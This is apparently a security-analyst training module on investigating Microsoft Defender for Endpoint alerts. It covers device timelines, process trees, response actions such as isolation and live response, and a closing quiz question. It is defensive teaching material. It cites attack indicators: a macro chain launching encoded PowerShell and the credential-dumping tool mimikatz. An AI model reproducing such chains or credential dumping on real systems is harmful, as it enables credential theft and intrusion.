1.4 Manage Microsoft Defender for Endpoint Investigations
Manage Microsoft Defender for Endpoint Investigations
Domain 3 — Manage Incident Response: "Investigate device timelines," "Perform actions on the device, including live response and collecting investigation packages," and "Perform evidence and entity investigation."
Introduction
When malware reaches a device — or an attacker gains remote access to one — Defender for Endpoint is where you investigate. This subsection teaches you to read device timelines, interpret process trees, take response actions, and collect forensic evidence. Module 4 covers the full Defender for Endpoint configuration in depth. This subsection focuses on the investigation skills you use when an endpoint alert fires.
The device timeline
The device timeline is a chronological view of everything that happened on a device: every process created, every network connection, every file written, every registry change, every logon event. It is the most detailed investigation data source for endpoint activity.
Reading a process tree: The most critical skill for endpoint investigation is reading parent-child process relationships. Legitimate software follows predictable patterns: explorer.exe → outlook.exe → winword.exe (user opens Outlook, opens Word attachment). Malicious behavior creates unusual chains: winword.exe → cmd.exe → powershell.exe → mimikatz.exe (macro launches command shell, downloads credential-dumping tool).
When investigating an endpoint alert:
- Open the device page from the incident → click the device entity
- Read the alert process tree — click the alert to see the specific process chain that triggered it
- Examine the parent process — is it a legitimate application launching a suspicious child?
- Check network connections — did the suspicious process connect to an external IP?
- Check file events — did the process drop files to disk?
| |
| Timestamp | GrandParent | Parent | Child | CommandLine |
|---|---|---|---|---|
| 09:14 | winword.exe | cmd.exe | powershell.exe | powershell -enc aQBl... |
-enc flag means Base64-encoded command — the attacker is hiding the payload. This process chain triggers ASR rules (Module 4.3) and should result in immediate device isolation.Response actions from the device page
| Action | What it does | When to use |
|---|---|---|
| Isolate device | Cuts all network except the Defender management channel | Confirmed compromise — stops lateral movement and C2 |
| Collect investigation package | Gathers processes, connections, scheduled tasks, autorun entries | Before isolation — captures live state |
| Run antivirus scan | Full or quick malware scan | Initial triage or post-remediation verification |
| Restrict app execution | Only Microsoft-signed executables can run | Active malware — prevents attacker tool execution |
| Live response | Remote command shell to the device | Forensic evidence collection, targeted file retrieval |
Isolation drops all active network connections. The investigation package captures live connections, running processes, and active sessions. Once isolated, some of this data changes or disappears. Collect first (30 seconds), then isolate. This sequence is detailed in Module 4.6.
Check your understanding
1. The device timeline shows: winword.exe → cmd.exe → powershell.exe -enc [base64]. What does this indicate and what is your response?